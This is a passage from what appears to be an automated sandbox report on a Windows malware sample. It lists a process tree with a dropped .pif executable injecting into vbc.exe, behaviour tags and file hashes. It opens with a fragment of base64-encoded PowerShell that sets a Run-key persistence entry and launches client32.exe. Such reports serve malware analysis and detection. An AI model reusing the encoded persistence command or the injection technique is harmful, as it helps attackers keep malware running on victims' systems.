UAeABlACIAOwAgAE4ARQBXAC0ASQB0AEUAbQBwAFIAbwBwAGUAUgBUAHkAIAAtAFAAYQB0AEgAIAAnAEgASwBDAHUAOgBcAHMAbwBGAFQAdwBBAFIAZQBcAE0ASQBDAHIAbwBzAG8ARgB0AFwAdwBpAE4ARABPAFcAUwBcAGMAVQBSAHIARQBuAFQAVgBFAFIAcwBJAE8ATgBcAHIAdQBuACcAIAAtAG4AQQBtAGUAIAAkAGcARwBCAEQAcgBuAGwAIAAtAHYAYQBsAFUAZQAgACQAWABDAFUARgBnAGMAcQAgAC0AUAByAE8AUABFAHIAdAB5AHQAeQBwAGUAIAAnAFMAdAByAGkAbgBnACcAOwAgAFMAdABhAHIAdAAtAFAAUgBPAEMAZQBTAFMAIABjAGwASQBFAG4AdAAzADIALgBFAFgAZQA7ACAAfQA7AA==5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3260
-
-
-
C:\Users\Admin\AppData\Roaming\RDJUYV.pif"C:\Users\Admin\AppData\Roaming\RDJUYV.pif" "C:\Users\Admin\AppData\Roaming\79AFBM.xlsx"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious use of WriteProcessMemory
PID:4144 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe5⤵PID:4604
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe5⤵
- System Location Discovery: System Language Discovery
PID:4012
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD55315900105942deb090a358a315b06fe
SHA122fe5d2e1617c31afbafb91c117508d41ef0ce44
SHA256e8bd7d8d1d0437c71aceb032f9fb08dd1147f41c048540254971cc60e95d6cd7
SHA51277e8d15b8c34a1cb01dbee7147987e2cc25c747e0f80d254714a93937a6d2fe08cb5a772cf85ceb8fec56415bfa853234a003173718c4229ba8cfcf2ce6335a6
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
1013KB
MD5f7b47df6923eabe96417f277c97f32bf
SHA1b031c79c7b8a2585d6c1eff80674b09eca5fc154
SHA256bbb3a5fa0a62a0c0c33b053b506866b62511f21966a4dd6777bb70a2c4b7267d
SHA51254f9584215ba5b1646b1c7d0f23c14793de4831c01214ca9f5828235dc366cbbdaeecc0b940a5ca3df4d458c14e7a881d9528671ef8bcc37baf758a6073914b4
-
Filesize
332B
MD5a93ef812fcdf3af24ff8b33a75d4992e
SHA1b282892bd321a8709474f43d790d7e661edaa98f
SHA256d5a89ca10e0e354df724efa955616b27501534cd5153f3c387c9d569a73cdbc6
SHA512272da3e9cb498541454f381d360e4dd47498ecf1f604844dcaea21316a3f37547688f52439d38bb6208f513ba8fc9e442b82cbb622c6579323530c342853b037
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
5.7MB
MD53c6d0866e54ab391bc09713fde4c9d38
SHA1a1a4e9c067e3c85739e85fb45f7ecdb363bcf856
SHA256ffe15bff44969541749b01e1ab80492c95990bf4af35fb62e0d93bf6a4b81682
SHA512eebf8ca2e3d778ca9706276b26c4d3daedf9cb7067d695cbf9e07755e6887e782d25a8aa6785034052b39105518c69f7e09b12c8199e58d13fcaf6b7f82b58b4
-
Filesize
921KB
MD53f58a517f1f4796225137e7659ad2adb
SHA1e264ba0e9987b0ad0812e5dd4dd3075531cfe269
SHA2561da298cab4d537b0b7b5dabf09bff6a212b9e45731e0cc772f99026005fb9e48
SHA512acf740aafce390d06c6a76c84e7ae7c0f721731973aadbe3e57f2eb63241a01303cc6bf11a3f9a88f8be0237998b5772bdaf569137d63ba3d0f877e7d27fc634